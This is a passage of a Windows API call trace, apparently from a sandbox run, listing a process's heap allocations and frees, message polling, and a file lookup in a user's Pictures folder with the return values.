returned 0x43a8ac8 [0087.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0087.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2190 [0087.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0087.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0087.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a8778 [0087.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0087.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0087.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0087.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0087.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0087.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9890 [0087.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0087.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0087.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0087.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0087.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0087.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0087.204] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0087.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0087.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0087.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0087.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0087.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0087.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0087.205] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0087.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0087.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0087.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0087.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0087.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0087.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0087.205] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\BWdI74zS0.bmp", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb170c140, ftCreationTime.dwHighDateTime=0x1d5e759, ftLastAccessTime.dwLowDateTime=0x7eeac220, ftLastAccessTime.dwHighDateTime=0x1d5ec54, ftLastWriteTime.dwLowDateTime=0x7eeac220, ftLastWriteTime.dwHighDateTime=0x1d5ec54, nFileSizeHigh=0x0, nFileSizeLow=0x7fc1, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="BWdI74zS0.bmp", cAlternateFileName="BWDI74~1.BMP")) returned 0x41ac540 [0087.205] FindClose (in: hFindFile=0x41ac540 | out: hFindFile=0x41ac540) returned 1 [0087.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0087.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0087.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf770 | out: hHeap=0x1780000) returned 1 [0087.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0087.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0087.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0087.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c78 [0087.206] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0087.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c78 | out: hHeap=0x1780000) returned 1 [0087.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0087.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0087.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22f0 [0087.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0087.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0087.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0087.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0087.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0087.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d28 [0087.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0087.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0087.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0087.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0087.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0087.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0087.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0087.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0087.207] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0087.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0087.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0087.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0087.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0087.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0087.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0087.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0087.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2280 [0087.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391dc8 [0087.207] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0087.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0087.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0087.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0087.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2230 [0087.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0087.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0087.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0087.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0087.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0087.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2180 [0087.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0087.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2190 [0087.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0087.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2190 [0087.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0087.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0087.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0087.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9dd0 [0087.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf798 [0087.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0087.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0087.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0087.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0087.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0087.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0087.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0087.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0087.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2280 [0087.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0087.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0087.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0087.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0087.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0087.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0087.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0087.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0087.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0087.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0087.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0087.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2290 [0087.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0087.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0087.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0087.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0087.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0087.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0087.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0087.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e70 [0087.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0087.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0087.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0087.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0087.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0087.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0087.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0087.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0087.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0087.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0087.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0087.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0087.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0087.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0087.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0087.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0087.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0087.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0087.210] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0087.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0087.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0087.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0087.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0087.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0087.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0087.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0087.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0087.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ef0 [0087.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0087.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0087.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0087.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0087.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0087.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0087.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0087.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0087.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0087.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0087.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0087.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0087.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0087.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0087.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0087.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0087.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0087.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0087.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0087.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0087.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0087.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0087.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0087.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0087.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0087.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0087.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0087.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0087.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0087.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0087.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0087.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0087.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0087.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0087.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0087.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0087.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0087.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0087.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0087.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0087.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0087.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0087.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0087.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0087.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0087.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0087.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0087.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0087.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0087.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0087.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0087.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0087.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0087.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0087.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0087.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0087.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0087.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0087.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0087.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0087.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0087.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0087.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0087.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0087.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0087.213] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0087.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0087.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0087.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0087.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0087.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0087.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0087.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0087.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0087.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0087.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0087.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0087.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0087.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0087.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0087.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0087.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0087.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0087.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0087.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0087.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0087.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0087.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0087.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0087.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0087.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0087.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0087.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0087.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0087.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0087.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0087.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 